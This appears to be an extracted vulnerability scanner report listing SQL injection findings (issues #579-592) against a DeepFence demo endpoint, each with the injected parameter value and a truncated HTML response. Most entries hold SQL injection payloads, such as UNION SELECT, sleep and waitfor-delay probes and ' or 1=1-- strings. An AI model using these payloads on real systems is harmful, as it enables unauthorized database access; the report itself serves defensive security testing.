href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #579\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iopg_sleep(5)--Response Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #580\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #581\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\" or true--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #582\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #583\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88\n)+CHAR(88)+CHAR(88)+CHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #584Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #585\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io')) or sleep(5)='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #586\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #587\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' or sleep(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #588\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 1=0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #589\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ;waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #590\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@\ndeepfence.io;%00\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #591\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin' or 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #592\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 25--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive 